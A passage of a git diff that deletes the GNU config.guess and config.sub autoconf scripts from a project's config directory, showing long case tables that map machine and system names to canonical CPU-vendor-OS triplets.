-	exit ;;
-    NEO-*:NONSTOP_KERNEL:*:*)
-	echo neo-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSE-*:NONSTOP_KERNEL:*:*)
-	echo nse-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSR-*:NONSTOP_KERNEL:*:*)
-	echo nsr-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSV-*:NONSTOP_KERNEL:*:*)
-	echo nsv-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSX-*:NONSTOP_KERNEL:*:*)
-	echo nsx-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    *:NonStop-UX:*:*)
-	echo mips-compaq-nonstopux
-	exit ;;
-    BS2000:POSIX*:*:*)
-	echo bs2000-siemens-sysv
-	exit ;;
-    DS/*:UNIX_System_V:*:*)
-	echo "$UNAME_MACHINE"-"$UNAME_SYSTEM"-"$UNAME_RELEASE"
-	exit ;;
-    *:Plan9:*:*)
-	# "uname -m" is not consistent, so use $cputype instead. 386
-	# is converted to i386 for consistency with other x86
-	# operating systems.
-	# shellcheck disable=SC2154
-	if test "$cputype" = 386; then
-	    UNAME_MACHINE=i386
-	else
-	    UNAME_MACHINE="$cputype"
-	fi
-	echo "$UNAME_MACHINE"-unknown-plan9
-	exit ;;
-    *:TOPS-10:*:*)
-	echo pdp10-unknown-tops10
-	exit ;;
-    *:TENEX:*:*)
-	echo pdp10-unknown-tenex
-	exit ;;
-    KS10:TOPS-20:*:* | KL10:TOPS-20:*:* | TYPE4:TOPS-20:*:*)
-	echo pdp10-dec-tops20
-	exit ;;
-    XKL-1:TOPS-20:*:* | TYPE5:TOPS-20:*:*)
-	echo pdp10-xkl-tops20
-	exit ;;
-    *:TOPS-20:*:*)
-	echo pdp10-unknown-tops20
-	exit ;;
-    *:ITS:*:*)
-	echo pdp10-unknown-its
-	exit ;;
-    SEI:*:*:SEIUX)
-	echo mips-sei-seiux"$UNAME_RELEASE"
-	exit ;;
-    *:DragonFly:*:*)
-	echo "$UNAME_MACHINE"-unknown-dragonfly"$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')"
-	exit ;;
-    *:*VMS:*:*)
-	UNAME_MACHINE=$( (uname -p) 2>/dev/null)
-	case "$UNAME_MACHINE" in
-	    A*) echo alpha-dec-vms ; exit ;;
-	    I*) echo ia64-dec-vms ; exit ;;
-	    V*) echo vax-dec-vms ; exit ;;
-	esac ;;
-    *:XENIX:*:SysV)
-	echo i386-pc-xenix
-	exit ;;
-    i*86:skyos:*:*)
-	echo "$UNAME_MACHINE"-pc-skyos"$(echo "$UNAME_RELEASE" | sed -e 's/ .*$//')"
-	exit ;;
-    i*86:rdos:*:*)
-	echo "$UNAME_MACHINE"-pc-rdos
-	exit ;;
-    *:AROS:*:*)
-	echo "$UNAME_MACHINE"-unknown-aros
-	exit ;;
-    x86_64:VMkernel:*:*)
-	echo "$UNAME_MACHINE"-unknown-esx
-	exit ;;
-    amd64:Isilon\ OneFS:*:*)
-	echo x86_64-unknown-onefs
-	exit ;;
-    *:Unleashed:*:*)
-	echo "$UNAME_MACHINE"-unknown-unleashed"$UNAME_RELEASE"
-	exit ;;
-esac
-
-# No uname command or uname output not recognized.
-set_cc_for_build
-cat > "$dummy.c" <
-#include 
-#endif
-#if defined(ultrix) || defined(_ultrix) || defined(__ultrix) || defined(__ultrix__)
-#if defined (vax) || defined (__vax) || defined (__vax__) || defined(mips) || defined(__mips) || defined(__mips__) || defined(MIPS) || defined(__MIPS__)
-#include 
-#if defined(_SIZE_T_) || defined(SIGLOST)
-#include 
-#endif
-#endif
-#endif
-main ()
-{
-#if defined (sony)
-#if defined (MIPSEB)
-  /* BFD wants "bsd" instead of "newsos".  Perhaps BFD should be changed,
-     I don't know....  */
-  printf ("mips-sony-bsd\n"); exit (0);
-#else
-#include 
-  printf ("m68k-sony-newsos%s\n",
-#ifdef NEWSOS4
-  "4"
-#else
-  ""
-#endif
-  ); exit (0);
-#endif
-#endif
-
-#if defined (NeXT)
-#if !defined (__ARCHITECTURE__)
-#define __ARCHITECTURE__ "m68k"
-#endif
-  int version;
-  version=$( (hostinfo | sed -n 's/.*NeXT Mach \([0-9]*\).*/\1/p') 2>/dev/null);
-  if (version < 4)
-    printf ("%s-next-nextstep%d\n", __ARCHITECTURE__, version);
-  else
-    printf ("%s-next-openstep%d\n", __ARCHITECTURE__, version);
-  exit (0);
-#endif
-
-#if defined (MULTIMAX) || defined (n16)
-#if defined (UMAXV)
-  printf ("ns32k-encore-sysv\n"); exit (0);
-#else
-#if defined (CMU)
-  printf ("ns32k-encore-mach\n"); exit (0);
-#else
-  printf ("ns32k-encore-bsd\n"); exit (0);
-#endif
-#endif
-#endif
-
-#if defined (__386BSD__)
-  printf ("i386-pc-bsd\n"); exit (0);
-#endif
-
-#if defined (sequent)
-#if defined (i386)
-  printf ("i386-sequent-dynix\n"); exit (0);
-#endif
-#if defined (ns32000)
-  printf ("ns32k-sequent-dynix\n"); exit (0);
-#endif
-#endif
-
-#if defined (_SEQUENT_)
-  struct utsname un;
-
-  uname(&un);
-  if (strncmp(un.version, "V2", 2) == 0) {
-    printf ("i386-sequent-ptx2\n"); exit (0);
-  }
-  if (strncmp(un.version, "V1", 2) == 0) { /* XXX is V1 correct? */
-    printf ("i386-sequent-ptx1\n"); exit (0);
-  }
-  printf ("i386-sequent-ptx\n"); exit (0);
-#endif
-
-#if defined (vax)
-#if !defined (ultrix)
-#include 
-#if defined (BSD)
-#if BSD == 43
-  printf ("vax-dec-bsd4.3\n"); exit (0);
-#else
-#if BSD == 199006
-  printf ("vax-dec-bsd4.3reno\n"); exit (0);
-#else
-  printf ("vax-dec-bsd\n"); exit (0);
-#endif
-#endif
-#else
-  printf ("vax-dec-bsd\n"); exit (0);
-#endif
-#else
-#if defined(_SIZE_T_) || defined(SIGLOST)
-  struct utsname un;
-  uname (&un);
-  printf ("vax-dec-ultrix%s\n", un.release); exit (0);
-#else
-  printf ("vax-dec-ultrix\n"); exit (0);
-#endif
-#endif
-#endif
-#if defined(ultrix) || defined(_ultrix) || defined(__ultrix) || defined(__ultrix__)
-#if defined(mips) || defined(__mips) || defined(__mips__) || defined(MIPS) || defined(__MIPS__)
-#if defined(_SIZE_T_) || defined(SIGLOST)
-  struct utsname *un;
-  uname (&un);
-  printf ("mips-dec-ultrix%s\n", un.release); exit (0);
-#else
-  printf ("mips-dec-ultrix\n"); exit (0);
-#endif
-#endif
-#endif
-
-#if defined (alliant) && defined (i860)
-  printf ("i860-alliant-bsd\n"); exit (0);
-#endif
-
-  exit (1);
-}
-EOF
-
-$CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null && SYSTEM_NAME=$($dummy) &&
-	{ echo "$SYSTEM_NAME"; exit; }
-
-# Apollos put the system type in the environment.
-test -d /usr/apollo && { echo "$ISP-apollo-$SYSTYPE"; exit; }
-
-echo "$0: unable to guess system type" >&2
-
-case "$UNAME_MACHINE:$UNAME_SYSTEM" in
-    mips:Linux | mips64:Linux)
-	# If we got here on MIPS GNU/Linux, output extra information.
-	cat >&2 <&2 <&2 </dev/null || echo unknown)
-uname -r = $( (uname -r) 2>/dev/null || echo unknown)
-uname -s = $( (uname -s) 2>/dev/null || echo unknown)
-uname -v = $( (uname -v) 2>/dev/null || echo unknown)
-
-/usr/bin/uname -p = $( (/usr/bin/uname -p) 2>/dev/null)
-/bin/uname -X     = $( (/bin/uname -X) 2>/dev/null)
-
-hostinfo               = $( (hostinfo) 2>/dev/null)
-/bin/universe          = $( (/bin/universe) 2>/dev/null)
-/usr/bin/arch -k       = $( (/usr/bin/arch -k) 2>/dev/null)
-/bin/arch              = $( (/bin/arch) 2>/dev/null)
-/usr/bin/oslevel       = $( (/usr/bin/oslevel) 2>/dev/null)
-/usr/convex/getsysinfo = $( (/usr/convex/getsysinfo) 2>/dev/null)
-
-UNAME_MACHINE = "$UNAME_MACHINE"
-UNAME_RELEASE = "$UNAME_RELEASE"
-UNAME_SYSTEM  = "$UNAME_SYSTEM"
-UNAME_VERSION = "$UNAME_VERSION"
-EOF
-fi
-
-exit 1
-
-# Local variables:
-# eval: (add-hook 'before-save-hook 'time-stamp)
-# time-stamp-start: "timestamp='"
-# time-stamp-format: "%:y-%02m-%02d"
-# time-stamp-end: "'"
-# End:
diff --git a/config/config.sub b/config/config.sub
deleted file mode 100755
index 63c1f1c8b..000000000
--- a/config/config.sub
+++ /dev/null
@@ -1,1860 +0,0 @@
-#! /bin/sh
-# Configuration validation subroutine script.
-#   Copyright 1992-2021 Free Software Foundation, Inc.
-
-timestamp='2021-01-08'
-
-# This file is free software; you can redistribute it and/or modify it
-# under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see .
-#
-# As a special exception to the GNU General Public License, if you
-# distribute this file as part of a program that contains a
-# configuration script generated by Autoconf, you may include it under
-# the same distribution terms that you use for the rest of that
-# program.  This Exception is an additional permission under section 7
-# of the GNU General Public License, version 3 ("GPLv3").
-
-
-# Please send patches to .
-#
-# Configuration subroutine to validate and canonicalize a configuration type.
-# Supply the specified configuration type as an argument.
-# If it is invalid, we print an error message on stderr and exit with code 1.
-# Otherwise, we print the canonical config type on stdout and succeed.
-
-# You can get the latest version of this script from:
-# https://git.savannah.gnu.org/cgit/config.git/plain/config.sub
-
-# This file is supposed to be the same for all GNU packages
-# and recognize all the CPU types, system types and aliases
-# that are meaningful with *any* GNU software.
-# Each package is responsible for reporting which valid configurations
-# it does not support.  The user should be able to distinguish
-# a failure to support a valid configuration from a meaningless
-# configuration.
-
-# The goal of this file is to map all the various variations of a given
-# machine specification into a single specification in the form:
-#	CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM
-# or in some cases, the newer four-part form:
-#	CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM
-# It is wrong to echo any other type of specification.
-
-me=$(echo "$0" | sed -e 's,.*/,,')
-
-usage="\
-Usage: $0 [OPTION] CPU-MFR-OPSYS or ALIAS
-
-Canonicalize a configuration name.
-
-Options:
-  -h, --help         print this help, then exit
-  -t, --time-stamp   print date of last modification, then exit
-  -v, --version      print version number, then exit
-
-Report bugs and patches to ."
-
-version="\
-GNU config.sub ($timestamp)
-
-Copyright 1992-2021 Free Software Foundation, Inc.
-
-This is free software; see the source for copying conditions.  There is NO
-warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."
-
-help="
-Try \`$me --help' for more information."
-
-# Parse command line
-while test $# -gt 0 ; do
-  case $1 in
-    --time-stamp | --time* | -t )
-       echo "$timestamp" ; exit ;;
-    --version | -v )
-       echo "$version" ; exit ;;
-    --help | --h* | -h )
-       echo "$usage"; exit ;;
-    -- )     # Stop option processing
-       shift; break ;;
-    - )	# Use stdin as input.
-       break ;;
-    -* )
-       echo "$me: invalid option $1$help" >&2
-       exit 1 ;;
-
-    *local*)
-       # First pass through any local machine types.
-       echo "$1"
-       exit ;;
-
-    * )
-       break ;;
-  esac
-done
-
-case $# in
- 0) echo "$me: missing argument$help" >&2
-    exit 1;;
- 1) ;;
- *) echo "$me: too many arguments$help" >&2
-    exit 1;;
-esac
-
-# Split fields of configuration type
-# shellcheck disable=SC2162
-IFS="-" read field1 field2 field3 field4 <&2
-		exit 1
-		;;
-	*-*-*-*)
-		basic_machine=$field1-$field2
-		basic_os=$field3-$field4
-		;;
-	*-*-*)
-		# Ambiguous whether COMPANY is present, or skipped and KERNEL-OS is two
-		# parts
-		maybe_os=$field2-$field3
-		case $maybe_os in
-			nto-qnx* | linux-* | uclinux-uclibc* \
-			| uclinux-gnu* | kfreebsd*-gnu* | knetbsd*-gnu* | netbsd*-gnu* \
-			| netbsd*-eabi* | kopensolaris*-gnu* | cloudabi*-eabi* \
-			| storm-chaos* | os2-emx* | rtmk-nova*)
-				basic_machine=$field1
-				basic_os=$maybe_os
-				;;
-			android-linux)
-				basic_machine=$field1-unknown
-				basic_os=linux-android
-				;;
-			*)
-				basic_machine=$field1-$field2
-				basic_os=$field3
-				;;
-		esac
-		;;
-	*-*)
-		# A lone config we happen to match not fitting any pattern
-		case $field1-$field2 in
-			decstation-3100)
-				basic_machine=mips-dec
-				basic_os=
-				;;
-			*-*)
-				# Second component is usually, but not always the OS
-				case $field2 in
-					# Prevent following clause from handling this valid os
-					sun*os*)
-						basic_machine=$field1
-						basic_os=$field2
-						;;
-					# Manufacturers
-					dec* | mips* | sequent* | encore* | pc533* | sgi* | sony* \
-					| att* | 7300* | 3300* | delta* | motorola* | sun[234]* \
-					| unicom* | ibm* | next | hp | isi* | apollo | altos* \
-					| convergent* | ncr* | news | 32* | 3600* | 3100* \
-					| hitachi* | c[123]* | convex* | sun | crds | omron* | dg \
-					| ultra | tti* | harris | dolphin | highlevel | gould \
-					| cbm | ns | masscomp | apple | axis | knuth | cray \
-					| microblaze* | sim | cisco \
-					| oki | wec | wrs | winbond)
-						basic_machine=$field1-$field2
-						basic_os=
-						;;
-					*)
-						basic_machine=$field1
-						basic_os=$field2
-						;;
-				esac
-			;;
-		esac
-		;;
-	*)
-		# Convert single-component short-hands not valid as part of
-		# multi-component configurations.
-		case $field1 in
-			386bsd)
-				basic_machine=i386-pc
-				basic_os=bsd
-				;;
-			a29khif)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			adobe68k)
-				basic_machine=m68010-adobe
-				basic_os=scout
-				;;
-			alliant)
-				basic_machine=fx80-alliant
-				basic_os=
-				;;
-			altos | altos3068)
-				basic_machine=m68k-altos
-				basic_os=
-				;;
-			am29k)
-				basic_machine=a29k-none
-				basic_os=bsd
-				;;
-			amdahl)
-				basic_machine=580-amdahl
-				basic_os=sysv
-				;;
-			amiga)
-				basic_machine=m68k-unknown
-				basic_os=
-				;;
-			amigaos | amigados)
-				basic_machine=m68k-unknown
-				basic_os=amigaos
-				;;
-			amigaunix | amix)
-				basic_machine=m68k-unknown
-				basic_os=sysv4
-				;;
-			apollo68)
-				basic_machine=m68k-apollo
-				basic_os=sysv
-				;;
-			apollo68bsd)
-				basic_machine=m68k-apollo
-				basic_os=bsd
-				;;
-			aros)
-				basic_machine=i386-pc
-				basic_os=aros
-				;;
-			aux)
-				basic_machine=m68k-apple
-				basic_os=aux
-				;;
-			balance)
-				basic_machine=ns32k-sequent
-				basic_os=dynix
-				;;
-			blackfin)
-				basic_machine=bfin-unknown
-				basic_os=linux
-				;;
-			cegcc)
-				basic_machine=arm-unknown
-				basic_os=cegcc
-				;;
-			convex-c1)
-				basic_machine=c1-convex
-				basic_os=bsd
-				;;
-			convex-c2)
-				basic_machine=c2-convex
-				basic_os=bsd
-				;;
-			convex-c32)
-				basic_machine=c32-convex
-				basic_os=bsd
-				;;
-			convex-c34)
-				basic_machine=c34-convex
-				basic_os=bsd
-				;;
-			convex-c38)
-				basic_machine=c38-convex
-				basic_os=bsd
-				;;
-			cray)
-				basic_machine=j90-cray
-				basic_os=unicos
-				;;
-			crds | unos)
-				basic_machine=m68k-crds
-				basic_os=
-				;;
-			da30)
-				basic_machine=m68k-da30
-				basic_os=
-				;;
-			decstation | pmax | pmin | dec3100 | decstatn)
-				basic_machine=mips-dec
-				basic_os=
-				;;
-			delta88)
-				basic_machine=m88k-motorola
-				basic_os=sysv3
-				;;
-			dicos)
-				basic_machine=i686-pc
-				basic_os=dicos
-				;;
-			djgpp)
-				basic_machine=i586-pc
-				basic_os=msdosdjgpp
-				;;
-			ebmon29k)
-				basic_machine=a29k-amd
-				basic_os=ebmon
-				;;
-			es1800 | OSE68k | ose68k | ose | OSE)
-				basic_machine=m68k-ericsson
-				basic_os=ose
-				;;
-			gmicro)
-				basic_machine=tron-gmicro
-				basic_os=sysv
-				;;
-			go32)
-				basic_machine=i386-pc
-				basic_os=go32
-				;;
-			h8300hms)
-				basic_machine=h8300-hitachi
-				basic_os=hms
-				;;
-			h8300xray)
-				basic_machine=h8300-hitachi
-				basic_os=xray
-				;;
-			h8500hms)
-				basic_machine=h8500-hitachi
-				basic_os=hms
-				;;
-			harris)
-				basic_machine=m88k-harris
-				basic_os=sysv3
-				;;
-			hp300 | hp300hpux)
-				basic_machine=m68k-hp
-				basic_os=hpux
-				;;
-			hp300bsd)
-				basic_machine=m68k-hp
-				basic_os=bsd
-				;;
-			hppaosf)
-				basic_machine=hppa1.1-hp
-				basic_os=osf
-				;;
-			hppro)
-				basic_machine=hppa1.1-hp
-				basic_os=proelf
-				;;
-			i386mach)
-				basic_machine=i386-mach
-				basic_os=mach
-				;;
-			isi68 | isi)
-				basic_machine=m68k-isi
-				basic_os=sysv
-				;;
-			m68knommu)
-				basic_machine=m68k-unknown
-				basic_os=linux
-				;;
-			magnum | m3230)
-				basic_machine=mips-mips
-				basic_os=sysv
-				;;
-			merlin)
-				basic_machine=ns32k-utek
-				basic_os=sysv
-				;;
-			mingw64)
-				basic_machine=x86_64-pc
-				basic_os=mingw64
-				;;
-			mingw32)
-				basic_machine=i686-pc
-				basic_os=mingw32
-				;;
-			mingw32ce)
-				basic_machine=arm-unknown
-				basic_os=mingw32ce
-				;;
-			monitor)
-				basic_machine=m68k-rom68k
-				basic_os=coff
-				;;
-			morphos)
-				basic_machine=powerpc-unknown
-				basic_os=morphos
-				;;
-			moxiebox)
-				basic_machine=moxie-unknown
-				basic_os=moxiebox
-				;;
-			msdos)
-				basic_machine=i386-pc
-				basic_os=msdos
-				;;
-			msys)
-				basic_machine=i686-pc
-				basic_os=msys
-				;;
-			mvs)
-				basic_machine=i370-ibm
-				basic_os=mvs
-				;;
-			nacl)
-				basic_machine=le32-unknown
-				basic_os=nacl
-				;;
-			ncr3000)
-				basic_machine=i486-ncr
-				basic_os=sysv4
-				;;
-			netbsd386)
-				basic_machine=i386-pc
-				basic_os=netbsd
-				;;
-			netwinder)
-				basic_machine=armv4l-rebel
-				basic_os=linux
-				;;
-			news | news700 | news800 | news900)
-				basic_machine=m68k-sony
-				basic_os=newsos
-				;;
-			news1000)
-				basic_machine=m68030-sony
-				basic_os=newsos
-				;;
-			necv70)
-				basic_machine=v70-nec
-				basic_os=sysv
-				;;
-			nh3000)
-				basic_machine=m68k-harris
-				basic_os=cxux
-				;;
-			nh[45]000)
-				basic_machine=m88k-harris
-				basic_os=cxux
-				;;
-			nindy960)
-				basic_machine=i960-intel
-				basic_os=nindy
-				;;
-			mon960)
-				basic_machine=i960-intel
-				basic_os=mon960
-				;;
-			nonstopux)
-				basic_machine=mips-compaq
-				basic_os=nonstopux
-				;;
-			os400)
-				basic_machine=powerpc-ibm
-				basic_os=os400
-				;;
-			OSE68000 | ose68000)
-				basic_machine=m68000-ericsson
-				basic_os=ose
-				;;
-			os68k)
-				basic_machine=m68k-none
-				basic_os=os68k
-				;;
-			paragon)
-				basic_machine=i860-intel
-				basic_os=osf
-				;;
-			parisc)
-				basic_machine=hppa-unknown
-				basic_os=linux
-				;;
-			psp)
-				basic_machine=mipsallegrexel-sony
-				basic_os=psp
-				;;
-			pw32)
-				basic_machine=i586-unknown
-				basic_os=pw32
-				;;
-			rdos | rdos64)
-				basic_machine=x86_64-pc
-				basic_os=rdos
-				;;
-			rdos32)
-				basic_machine=i386-pc
-				basic_os=rdos
-				;;
-			rom68k)
-				basic_machine=m68k-rom68k
-				basic_os=coff
-				;;
-			sa29200)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			sei)
-				basic_machine=mips-sei
-				basic_os=seiux
-				;;
-			sequent)
-				basic_machine=i386-sequent
-				basic_os=
-				;;
-			sps7)
-				basic_machine=m68k-bull
-				basic_os=sysv2
-				;;
-			st2000)
-				basic_machine=m68k-tandem
-				basic_os=
-				;;
-			stratus)
-				basic_machine=i860-stratus
-				basic_os=sysv4
-				;;
-			sun2)
-				basic_machine=m68000-sun
-				basic_os=
-				;;
-			sun2os3)
-				basic_machine=m68000-sun
-				basic_os=sunos3
-				;;
-			sun2os4)
-				basic_machine=m68000-sun
-				basic_os=sunos4
-				;;
-			sun3)
-				basic_machine=m68k-sun
-				basic_os=
-				;;
-			sun3os3)
-				basic_machine=m68k-sun
-				basic_os=sunos3
-				;;
-			sun3os4)
-				basic_machine=m68k-sun
-				basic_os=sunos4
-				;;
-			sun4)
-				basic_machine=sparc-sun
-				basic_os=
-				;;
-			sun4os3)
-				basic_machine=sparc-sun
-				basic_os=sunos3
-				;;
-			sun4os4)
-				basic_machine=sparc-sun
-				basic_os=sunos4
-				;;
-			sun4sol2)
-				basic_machine=sparc-sun
-				basic_os=solaris2
-				;;
-			sun386 | sun386i | roadrunner)
-				basic_machine=i386-sun
-				basic_os=
-				;;
-			sv1)
-				basic_machine=sv1-cray
-				basic_os=unicos
-				;;
-			symmetry)
-				basic_machine=i386-sequent
-				basic_os=dynix
-				;;
-			t3e)
-				basic_machine=alphaev5-cray
-				basic_os=unicos
-				;;
-			t90)
-				basic_machine=t90-cray
-				basic_os=unicos
-				;;
-			toad1)
-				basic_machine=pdp10-xkl
-				basic_os=tops20
-				;;
-			tpf)
-				basic_machine=s390x-ibm
-				basic_os=tpf
-				;;
-			udi29k)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			ultra3)
-				basic_machine=a29k-nyu
-				basic_os=sym1
-				;;
-			v810 | necv810)
-				basic_machine=v810-nec
-				basic_os=none
-				;;
-			vaxv)
-				basic_machine=vax-dec
-				basic_os=sysv
-				;;
-			vms)
-				basic_machine=vax-dec
-				basic_os=vms
-				;;
-			vsta)
-				basic_machine=i386-pc
-				basic_os=vsta
-				;;
-			vxworks960)
-				basic_machine=i960-wrs
-				basic_os=vxworks
-				;;
-			vxworks68)
-				basic_machine=m68k-wrs
-				basic_os=vxworks
-				;;
-			vxworks29k)
-				basic_machine=a29k-wrs
-				basic_os=vxworks
-				;;
-			xbox)
-				basic_machine=i686-pc
-				basic_os=mingw32
-				;;
-			ymp)
-				basic_machine=ymp-cray
-				basic_os=unicos
-				;;
-			*)
-				basic_machine=$1
-				basic_os=
-				;;
-		esac
-		;;
-esac
-
-# Decode 1-component or ad-hoc basic machines
-case $basic_machine in
-	# Here we handle the default manufacturer of certain CPU types.  It is in
-	# some cases the only manufacturer, in others, it is the most popular.
-	w89k)
-		cpu=hppa1.1
-		vendor=winbond
-		;;
-	op50n)
-		cpu=hppa1.1
-		vendor=oki
-		;;
-	op60c)
-		cpu=hppa1.1
-		vendor=oki
-		;;
-	ibm*)
-		cpu=i370
-		vendor=ibm
-		;;
-	orion105)
-		cpu=clipper
-		vendor=highlevel
-		;;
-	mac | mpw | mac-mpw)
-		cpu=m68k
-		vendor=apple
-		;;
-	pmac | pmac-mpw)
-		cpu=powerpc
-		vendor=apple
-		;;
-
-	# Recognize the various machine names and aliases which stand
-	# for a CPU type and a company and sometimes even an OS.
-	3b1 | 7300 | 7300-att | att-7300 | pc7300 | safari | unixpc)
-		cpu=m68000
-		vendor=att
-		;;
-	3b*)
-		cpu=we32k
-		vendor=att
-		;;
-	bluegene*)
-		cpu=powerpc
-		vendor=ibm
-		basic_os=cnk
-		;;
-	decsystem10* | dec10*)
-		cpu=pdp10
-		vendor=dec
-		basic_os=tops10
-		;;
-	decsystem20* | dec20*)
-		cpu=pdp10
-		vendor=dec
-		basic_os=tops20
-		;;
-	delta | 3300 | motorola-3300 | motorola-delta \
-	      | 3300-motorola | delta-motorola)
-		cpu=m68k
-		vendor=motorola
-		;;
-	dpx2*)
-		cpu=m68k
-		vendor=bull
-		basic_os=sysv3
-		;;
-	encore | umax | mmax)
-		cpu=ns32k
-		vendor=encore
-		;;
-	elxsi)
-		cpu=elxsi
-		vendor=elxsi
-		basic_os=${basic_os:-bsd}
-		;;
-	fx2800)
-		cpu=i860
-		vendor=alliant
-		;;
-	genix)
-		cpu=ns32k
-		vendor=ns
-		;;
-	h3050r* | hiux*)
-		cpu=hppa1.1
-		vendor=hitachi
-		basic_os=hiuxwe2
-		;;
-	hp3k9[0-9][0-9] | hp9[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	hp9k2[0-9][0-9] | hp9k31[0-9])
-		cpu=m68000
-		vendor=hp
-		;;
-	hp9k3[2-9][0-9])
-		cpu=m68k
-		vendor=hp
-		;;
-	hp9k6[0-9][0-9] | hp6[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	hp9k7[0-79][0-9] | hp7[0-79][0-9])
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k78[0-9] | hp78[0-9])
-		# FIXME: really hppa2.0-hp
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[67]1 | hp8[67]1 | hp9k80[24] | hp80[24] | hp9k8[78]9 | hp8[78]9 | hp9k893 | hp893)
-		# FIXME: really hppa2.0-hp
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[0-9][13679] | hp8[0-9][13679])
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[0-9][0-9] | hp8[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	i*86v32)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv32
-		;;
-	i*86v4*)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv4
-		;;
-	i*86v)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv
-		;;
-	i*86sol2)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=solaris2
-		;;
-	j90 | j90-cray)
-		cpu=j90
-		vendor=cray
-		basic_os=${basic_os:-unicos}
-		;;
-	iris | iris4d)
-		cpu=mips
-		vendor=sgi
-		case $basic_os in
-		    irix*)
-			;;
-		    *)
-			basic_os=irix4
-			;;
-		esac
-		;;
-	miniframe)
-		cpu=m68000
-		vendor=convergent
-		;;
-	*mint | mint[0-9]* | *MiNT | *MiNT[0-9]*)
-		cpu=m68k
-		vendor=atari
-		basic_os=mint
-		;;
-	news-3600 | risc-news)
-		cpu=mips
-		vendor=sony
-		basic_os=newsos
-		;;
-	next | m*-next)
-		cpu=m68k
-		vendor=next
-		case $basic_os in
-		    openstep*)
-		        ;;
-		    nextstep*)
-			;;
-		    ns2*)
-		      basic_os=nextstep2
-			;;
-		    *)
-		      basic_os=nextstep3
-			;;
-		esac
-		;;
-	np1)
-		cpu=np1
-		vendor=gould
-		;;
-	op50n-* | op60c-*)
-		cpu=hppa1.1
-		vendor=oki
-		basic_os=proelf
-		;;
-	pa-hitachi)
-		cpu=hppa1.1
-		vendor=hitachi
-		basic_os=hiuxwe2
-		;;
-	pbd)
-		cpu=sparc
-		vendor=tti
-		;;
-	pbb)
-		cpu=m68k
-		vendor=tti
-		;;
-	pc532)
-		cpu=ns32k
-		vendor=pc532
-		;;
-	pn)
-		cpu=pn
-		vendor=gould
-		;;
-	power)
-		cpu=power
-		vendor=ibm
-		;;
-	ps2)
-		cpu=i386
-		vendor=ibm
-		;;
-	rm[46]00)
-		cpu=mips
-		vendor=siemens
-		;;
-	rtpc | rtpc-*)
-		cpu=romp
-		vendor=ibm
-		;;
-	sde)
-		cpu=mipsisa32
-		vendor=sde
-		basic_os=${basic_os:-elf}
-		;;
-	simso-wrs)
-		cpu=sparclite
-		vendor=wrs
-		basic_os=vxworks
-		;;
-	tower | tower-32)
-		cpu=m68k
-		vendor=ncr
-		;;
-	vpp*|vx|vx-*)
-		cpu=f301
-		vendor=fujitsu
-		;;
-	w65)
-		cpu=w65
-		vendor=wdc
-		;;
-	w89k-*)
-		cpu=hppa1.1
-		vendor=winbond
-		basic_os=proelf
-		;;
-	none)
-		cpu=none
-		vendor=none
-		;;
-	leon|leon[3-9])
-		cpu=sparc
-		vendor=$basic_machine
-		;;
-	leon-*|leon[3-9]-*)
-		cpu=sparc
-		vendor=$(echo "$basic_machine" | sed 's/-.*//')
-		;;
-
-	*-*)
-		# shellcheck disable=SC2162
-		IFS="-" read cpu vendor <&2
-				exit 1
-				;;
-		esac
-		;;
-esac
-
-# Here we canonicalize certain aliases for manufacturers.
-case $vendor in
-	digital*)
-		vendor=dec
-		;;
-	commodore*)
-		vendor=cbm
-		;;
-	*)
-		;;
-esac
-
-# Decode manufacturer-specific aliases for certain operating systems.
-
-if test x$basic_os != x
-then
-
-# First recognize some ad-hoc caes, or perhaps split kernel-os, or else just
-# set os.
-case $basic_os in
-	gnu/linux*)
-		kernel=linux
-		os=$(echo $basic_os | sed -e 's|gnu/linux|gnu|')
-		;;
-	os2-emx)
-		kernel=os2
-		os=$(echo $basic_os | sed -e 's|os2-emx|emx|')
-		;;
-	nto-qnx*)
-		kernel=nto
-		os=$(echo $basic_os | sed -e 's|nto-qnx|qnx|')
-		;;
-	*-*)
-		# shellcheck disable=SC2162
-		IFS="-" read kernel os <&2
-		exit 1
-		;;
-esac
-
-# As a final step for OS-related things, validate the OS-kernel combination
-# (given a valid OS), if there is a kernel.
-case $kernel-$os in
-	linux-gnu* | linux-dietlibc* | linux-android* | linux-newlib* | linux-musl* | linux-uclibc* )
-		;;
-	uclinux-uclibc* )
-		;;
-	-dietlibc* | -newlib* | -musl* | -uclibc* )
-		# These are just libc implementations, not actual OSes, and thus
-		# require a kernel.
-		echo "Invalid configuration \`$1': libc \`$os' needs explicit kernel." 1>&2
-		exit 1
-		;;
-	kfreebsd*-gnu* | kopensolaris*-gnu*)
-		;;
-	vxworks-simlinux | vxworks-simwindows | vxworks-spe)
